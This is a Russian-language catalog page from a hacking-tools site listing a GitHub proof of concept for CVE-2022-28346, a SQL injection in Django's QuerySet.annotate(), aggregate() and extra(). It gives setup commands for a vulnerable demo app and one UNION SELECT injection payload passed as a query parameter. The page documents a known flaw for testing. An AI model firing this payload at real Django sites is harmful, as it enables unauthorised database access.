Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-28346 — Обнаружена проблема в Django 2.2 до 2.2.28, 3.2 до 3.2.13 и 4.0 до 4.0.4. Методы QuerySet.annotate(), aggregate() и extra() подвержены SQL-инъекции в псевдонимах столбцов через специально созданный словарь (с раскрытием словаря), передаваемый в качестве **kwargs. | Kitploit
Инструменты/GitHubGitHub/vincentinttsh/cve-2022-28346
Анализ уязвимостейАнализ КодаЭксплуатацияЭксплуатация веб-приложенийБезопасность Баз Данных
GitHubvincentinttsh/cve-2022-28346

CVE-2022-28346

Обнаружена проблема в Django 2.2 до 2.2.28, 3.2 до 3.2.13 и 4.0 до 4.0.4. Методы QuerySet.annotate(), aggregate() и extra() подвержены SQL-инъекции в псевдонимах столбцов через специально созданный словарь (с раскрытием словаря), передаваемый в качестве **kwargs.

Репозиторий
84 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-28346 PoC Tweet

Воздействие:

  • Потенциальная SQL-инъекция в QuerySet.annotate(), aggregate() и extra().

Установка

root@kitploit:~
poetry install
python manage.py makemigrations
python manage.py migrate
python manage.py loaddata data.json
python manage.py runserver

PoC

root@kitploit:~
?field=poc.title" FROM "poc_blog" union SELECT "-1,",sqlite_version(),"3" --

poc-image

Ссылки

CVE Mitre

Django

Скачать инструмент